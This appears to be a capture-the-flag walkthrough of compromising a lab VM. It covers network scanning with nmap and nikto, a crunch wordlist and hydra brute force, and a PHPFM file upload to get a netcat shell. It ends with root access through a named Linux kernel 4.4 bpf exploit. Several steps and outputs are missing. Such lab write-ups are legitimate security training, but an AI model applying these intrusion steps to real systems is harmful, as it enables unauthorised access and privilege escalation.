- Burp Suite
- PHPFM Arbitrary File Upload
- Linux Kernel 4.4.x (Ubuntu 16.04) - ‘double-fdput()’ in bpf(BPF_PROG_LOAD) Local Root Exploit
Use netdiscover to detect target IP address
netdiscover -i eth0 -r 192.168.41.0/24
192.168.41.153 is the target.
Then run nmap to detect opening ports and running services on the target machine.
nmap -sV -v -O -A -T5 192.168.41.153 -p-
Only port 80 is opening.
use nikto to scan
nikto -h 192.168.41.153
No useful info come out.
still same thing.
check the http://192.168.41.153, find a picture,
check the picture info:
find a path:
now use nikto to scan that path,
nikto -h http://192.168.41.153/commodore64/
find an interesting file
check that file,
get the login page, and the CMS seems PHPFM
find a PHPFM Arbitrary File Upload, now I need to find a way to upload the shell. First, I have to get the access to the PHPFM
http://192.168.41.153/commodore64, I found:
I will try
robhubbard as username. Password a C64 sound chip lowercase 3letters4digits without spaces… After checking wikipedia and more sites, seems that MOS is one of the sound chips (3 letters) Time to make our dictionary with MOS + 4 numbers and minimum+maximum of 7 words.
crunch 7 7 -t mos%%%% > test.txt
before using hydra to crack password, I use Burp to get incorrect login response,
get the password
login, get the page:
set up netcat and go to
get the shell:
Since the Linux kernel version here is 4.4.0
searchsploit 4.4 | grep linux
Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit
upload the 39772.zip via phpfm, in the shell
find / -name 39772.zip
shows the file in
1 2 3 4 5 6 7
get the root: